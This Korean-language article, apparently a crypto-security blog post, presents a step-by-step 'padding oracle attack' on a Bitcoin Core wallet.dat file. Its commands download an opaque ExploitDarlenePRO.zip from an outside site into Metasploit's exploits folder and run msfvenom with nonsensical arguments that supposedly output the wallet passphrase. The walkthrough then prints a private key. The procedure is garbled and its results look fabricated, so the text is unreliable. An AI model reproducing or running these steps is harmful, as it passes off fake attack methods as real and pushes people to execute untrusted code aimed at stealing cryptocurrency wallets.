<iframe width="560" height="315" src="https://www.youtube.com/embed/0aCfT-kCRlw?si=4WBhkNaS1Yw4okF6" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen=""></iframe>
이 기사에서는 사이버 보안 리소스 [CAPEC™] 의 일반적인 공격 패턴 분류를 사용합니다 . “Padding Oracle Attack”은 2012년 Wallet.dat (취약성 관리 및 위협 분석 플랫폼 “VulDB” ) 에서 처음 논의되었습니다 . 가장 인기 있는 비트코인 코어AES Encryption Padding 지갑의 문제가 파일 작업에 영향을 미칩니다 Wallet.dat
이 공격의 기술적 세부 사항은 다음과 같이 알려져 있습니다.
대상 시스템에서 암호문을 복호화할 때 패딩 오류가 발생했는지 여부에 대한 정보가 유출되면 공격자가 복호화 키를 알지 못해도 데이터를 효과적으로 복호화할 수 있습니다. 이러한 유형의 정보를 전송하는 대상 시스템은 패딩 오라클이 되며, 공격자는 복호화 키를 알지 못한 채 이 오라클을 사용하여 데이터를 효율적으로 복호화하여
128*b패딩 오라클에 평균 호출을b발행 할 수 있습니다. 암호문 블록). 암호 해독을 수행하는 것 외에도 공격자는 암호화 키를 알지 못한 채 패딩 오라클을 사용하여 유효한 암호문을 생성(즉, 암호화 수행)할 수도 있습니다.
암호화된 메시지가 해독되기 전에 유효성을 보장하기 위해 인증되지 않고 패딩 오류 정보가 공격자에게 전달되는 경우 모든 암호화 시스템은 패딩 오라클 공격에 취약할 수 있습니다. 예를 들어 이 공격 방법은 CAPTCHA 시스템을 손상시키거나 클라이언트 측 개체(예: 숨겨진 필드 또는 쿠키)에 저장된 상태 정보를 해독/수정하는 데 사용될 수 있습니다.
이 공격 방법은 제대로 구현되지 않은 암호 해독 절차에서 유출된 데이터를 사용하여 암호 시스템을 완전히 훼손하는 암호 시스템에 대한 부채널 공격입니다. 어떤 형태로든 암호 해독 중에 패딩 오류가 발생했는지 여부를 공격자에게 알려주는 단일 정보만으로도 공격자가 암호 시스템을 깨뜨릴 수 있습니다. 이 정보는 명시적인 완료 오류 메시지, 빈 페이지 반환 또는 서버 응답 시간이 더 오래 걸린다는 정보(타이밍 공격)의 형태로 나타날 수 있습니다.
이 공격은 공격자가 도메인 간 정보 유출을 사용하여 피해자가 상호 작용하는 대상 시스템/서비스의 패딩 오라클로부터 정보 비트를 얻을 수 있는 크로스 도메인 모드에서 실행될 수 있습니다.
대칭 암호화에서는 AES-256-CBC 암호화 모드(비트코인 코어에서 사용됨)에서 패딩 오라클 공격을 수행할 수 있으며, 여기서 "오라클"(소스)은 암호화된 메시지의 패딩이 올바른지 또는 아니다. 이러한 데이터를 통해 공격자는 암호화 키를 알지 못한 채oracle 키를 사용하여 oracle을 통해 메시지를 해독할 수 있습니다 .
프로세스에서 Wallet.dat 파일의 oracle을 채우고 궁극적으로 바이너리 형식으로 필요한 비밀번호를 찾기 위해 실제적인 부분으로 넘어가 익스플로잇을 통해 일련의 작업을 수행해 보겠습니다.
Capture The Flag (CTF)
앞서 연구원들과 토너먼트 참가자들은 CTF해킹된 [ wallet.dat 2023 ] 비트코인 지갑: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b 금액을 공개했습니다 : 44502.421.17461256 BTC
Bitcoin Core 버전 22.1 에 대한 링크를 따라가 보겠습니다.releases
https://github.com/bitcoin/bitcoin/releases
../ test.rc1/ 2022년 11월 8일 18:08 - test.rc2/ 2022년 11월 28일 09:39 - SHA256SUMS 2022년 12월 14일 17:59 2353 SHA256SUMS.asc 2022년 12월 14일 17:59 10714 SHA256SUMS.ots 2022년 12월 14일 17:59 538 bitcoin-22.1-aarch64-linux-gnu.tar.gz 2022년 12월 14일 17:59 34264786 bitcoin-22.1-arm-linux-gnueabihf.tar.gz 14- 2022년 12월 18:00 30424198 bitcoin-22.1-osx-signed.dmg 2022년 12월 14일 18:00 14838454 bitcoin-22.1-osx64.tar.gz 2022 년 12월 14일 18:00 27930578 bitcoin-22.1-powerpc64-linux -gnu.tar.gz 2022년 12월 14일 18:00 39999102 bitcoin-22.1-powerpc64le-linux-gnu.tar.gz 2022년 12월 14일 18:00 38867643 bitcoin-22.1-riscv64-linux-gnu.tar.gz 2022년 12월 14일 18:01 34114511 bitcoin-22.1-win64-setup.exe 2022년 12월 14일 18:01 18771672 bitcoin-22.1-win64.zip 2022 년 12월 14일 18:01 34263968 bitcoin-22.1-x86_64-linux -gnu.tar.gz 2022년 12월 14일 18:01 35964880 bitcoin-22.1.tar.gz 2022년 12월 14일 18:01 8122372 bitcoin-22.1.torrent 2022년 12월 14일 18:01 49857
다음 키를 누르세요.Ctrl + Q
QT새 파일을 동기화하려면 프로그램을 다시 시작해야 합니다.wallet.dat
getaddressinfo 명령을 사용하여 확인해 보겠습니다. 비트코인 지갑: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
getaddressinfo "address"
Return information about the given bitcoin address.
Some of the information will only be present if the address is in the active wallet.
다음 명령을 실행해 보겠습니다.
getaddressinfo 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b 결과:
{
"address": "1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b",
"scriptPubKey": "76a9147774801e52a110aba2d65ecc58daf0cfec95a09f88ac",
"ismine": true,
"solvable": true,
"desc": "pkh([7774801e]02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f)#qzqmjdel",
"iswatchonly": false,
"isscript": false,
"iswitness": false,
"pubkey": "02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f",
"iscompressed": true,
"ischange": false,
"timestamp": 1,
"labels": [
""
]
}
dumpprivkey 명령을 실행하여 비트코인 지갑의 개인 키를 가져옵니다: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
dumpprivkey "address"
Reveals the private key corresponding to 'address'.
Then the importprivkey can be used with this output다음 명령을 실행해 보겠습니다.
dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
결과:
Error: Please enter the wallet passphrase with walletpassphrase first. (code -13)
비트코인 지갑의 개인 키에 대한 접근은 비밀번호로 보호되어 있음을 알 수 있습니다.
passphrase ?!?!?
passphrase ?!?!?
passphrase ?!?!?비밀번호를 바이너리 형식으로 실행 하고 해독해 보겠습니다. 이를 위해서는 비트코인 코어 통합/스테이징 트리Padding Oracle Attack на Wallet.dat 저장소를 설치해야 합니다 . 이를 위해 Jupyter Notebook 에서 완성된 파일을 열고 Google Colab 노트북 에 업로드 할 수 있습니다 .
ht tps:https://github.com/demining/CryptoDeepTools/tree/main/27PaddingOracleAttackonWalletdat
Padding_Oracle_Attack_on_Wallet_dat.ipynb
https://colab.research.google.com 링크를 사용하여 Google Colab 서비스를 열어 보겠습니다.
클릭
"+"하고 "새 메모장 만들기"를 클릭하세요.
필요한 프로그램을 실행하기 위해 객체 지향 프로그래밍 언어인 Ruby를 설치하겠습니다.
!sudo apt install ruby-full
설치 버전을 확인해보자
!ruby --version
'bitcoin-ruby'비트코인 프로토콜/네트워크와 상호 작용하기 위한 라이브러리를 설치해 보겠습니다.
!gem install bitcoin-ruby
'ecdsa'ECDSA(Elliptic Curve Digital Signature Algorithm)를 구현하기 위한 라이브러리를 설치해 보겠습니다.
!gem install ecdsa
'base58'정수나 이진수를 변환하는 라이브러리를 설치해 봅시다base58.
!gem install base58
'crypto'바이트 작업과 기본 암호화 작업을 단순화하기 위해 라이브러리를 설치해 보겠습니다.
!gem install crypto
'config-hash'빅데이터 작업을 단순화하기 위해 라이브러리를 설치해 보겠습니다 .
!gem install config-hash -v 0.9.0
GitHub 에서 Metasploit Framework를 설치 하고 MSFVenom 도구를 사용하여 페이로드를 생성해 보겠습니다.
!git clone https://github.com/rapid7/metasploit-framework.git
lscd metasploit-framework/
폴더 내용을 살펴보자
"metasploit-framework"
ls
!./msfvenom -help 
Google Colab에 Bitcoin Core 통합/스테이징 트리를 설치해 보겠습니다 .
!git clone https://github.com/bitcoin/bitcoin.git
ls
Wallet.dat에 대한 Padding Oracle Attack을 실행하기 위한 익스플로잇을 통합하기 위해 디렉토리를 통해 aes.cpp 파일로 이동해 보겠습니다.
cd bitcoin/src/crypto/ls
cat 유틸리티를 사용하여 aes.cpp 파일을 엽니다.
cat aes.cpp
공격을 수행하려면 wallet.dat 파일을 bitcoin/src/crypto/ 디렉터리에 업로드하세요.
유틸리티를 사용 하고 27PaddingOracleAttackonWalletdat 저장소 에서 wallet.dat를
wget다운로드해 보겠습니다.
!wget https://github.com/demining/CryptoDeepTools/raw/29bf95739c7b7464beaeb51803d4d2e1605ce954/27PaddingOracleAttackonWalletdat/wallet.dat
bitcoin/src/crypto/ 디렉터리의 내용을 확인해 보겠습니다.
ls
다시 돌아가자Metasploit Framework
cd /
cd content/metasploit-framework/
ls
디렉토리에 따라 폴더를 열어 보겠습니다./modules/exploits/
"ExploitDarlenePRO"카탈로그에서 다운로드 :/modules/exploits/
cd modules/
ls
cd exploits/
!wget https://darlene.pro/repository/fe9b4545d58e43c1704b0135383e5f124f36e40cb54d29112d8ae7babadae791/ExploitDarlenePRO.zip
ExploitDarlenePRO.zip유틸리티를 사용하여 콘텐츠의 압축을 풉니다.unzip
!unzip ExploitDarlenePRO.zip
카탈로그를 살펴보겠습니다./ExploitDarlenePRO/
ls
cd ExploitDarlenePRO/
ls
익스플로잇을 실행하려면 다음으로 돌아가자.Metasploit Framework
cd /
cd content/metasploit-framework/
ls
LHOST (Local Host)공격하는 가상 머신을 식별해야 합니다 IP-address.
다음 명령을 실행해 보겠습니다.
!ip addr
!hostname -I
도구를 사용하여 페이로드를 생성해 보겠습니다. MSFVenom
작동하려면 비트코인 지갑: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b 를 선택하세요.
실행 명령:
!./msfvenom 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o decode_core.rb -p bitcoin/src/crypto LHOST=172.28.0.12 -f CPP -o aes.cpp -p bitcoin/src/crypto LHOST=172.28.0.12 -f DAT -o wallet.dat
결과:
1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101결과 바이너리 형식을 파일에 저장해야 합니다. Python 스크립트를walletpassphrase.txt 사용합니다 .
팀:
import hashlib
Binary = "1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101"
f = open("walletpassphrase.txt", 'w')
f.write("walletpassphrase " + Binary + " 60" + "\n")
f.write("" + "\n")
f.close()
파일을 엽니다: walletpassphrase.txt
lscat walletpassphrase.txt
walletpassphrase 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 60
dumpprivkey "address"콘솔을 통해 명령을 사용해 봅시다Bitcoin Core
팀:
walletpassphrase 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 60
dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
결과:
KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz
라이브러리를 설치해보자
Bitcoin Utils
pip3 install bitcoin-utils
비트코인 주소의 준수 여부를 확인하는 코드를 실행해 보겠습니다 .
Private key WIF: KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz
Public key: 02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f
Address: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
Hash160: 7774801e52a110aba2d65ecc58daf0cfec95a09f
--------------------------------------
The message to sign: CryptoDeepTech
The signature is: ILPeG1ThZ0XUXz3iPvd0Q6ObUTF7SxmnhUK2q0ImEeepcZ00npIRqMWOLEfWSJTKd1g56CsRFa/xI/fRUQVi19Q=
The signature is valid!좋아요! 개인 키는 비트코인 지갑에 해당합니다.
비트 주소를 열고 확인해 봅시다:
ADDR: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
WIF: KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz
HEX: 3A32D38E814198CC8DD20B49752615A835D67041C4EC94489A61365D9B6AD330
- [1] 실용적인 패딩 오라클 공격 (Juliano Rizzo Thai Duong) [2010]
- [2] 암호화 하드웨어에 대한 효율적인 패딩 Oracle 공격 (Romain Bardou, Riccardo Focardi, Yusuke Kawamoto, Lorenzo Simionato, Graham Steel, Joe-Kai Tsay)
- [3] SSL, IPSEC, WTLS에 대한 CBC 패딩 애플리케이션으로 인한 보안 결함 … (Serge Vaudenay)
- [4] PKCS#1 v1.5에 대한 패딩 Oracle 공격: 비표준 구현이 대피소 역할을 할 수 있음 (Si Gao, Hua Chen 및 Limin Fan)
- [5] 공격과 방어 (Falko Strenzke 박사) [2020]
- [6] CBC 패딩 오라클 공격 [2023]
- [7] 패딩 오라클과 함께하는 즐거움 (저스틴 클라크) [OWASP 런던 장]
- [8] RSA에 대한 실제 패딩 Oracle 공격 (Riccardo Focardi)
- [9] 패딩 오라클 공격 (Fionn Fitzmaurice) [2018]
- [10] CBC 패딩 오라클 Eli Sohl 악용 [2021]
- [ 11 ] Oracle 공격 분할 (Julia Len, Paul Grubbs, Thomas Ristenpart) [Cornell Tech]
- [ 12 ] 패딩 및 CBC 모드 (David Wagner 및 Bruce Schneider) [1997]
- [ 13 ] Oracle 공격 패딩 (방법론)
- [ 14 ] Padding Oracle 공격 (도입 패킷 암호화 모드 CTF 이벤트)
이 자료는 BITCOIN 암호화폐 의 약한 ECDSA 서명 에 대해 데이터 및 타원 곡선 암호화 secp256k1 의 금융 보안을 보장하기 위해 CRYPTO DEEP TECH 포털용 으로 제작되었습니다 . 소프트웨어 제작자는 자료 사용에 대해 책임을 지지 않습니다.
텔레그램: https://t.me/cryptodeeptech
영상자료 : https://youtu.be/0aCfT-kCRlw
출처: https://cryptodeep.ru/padding-oracle-attack-on-wallet-dat
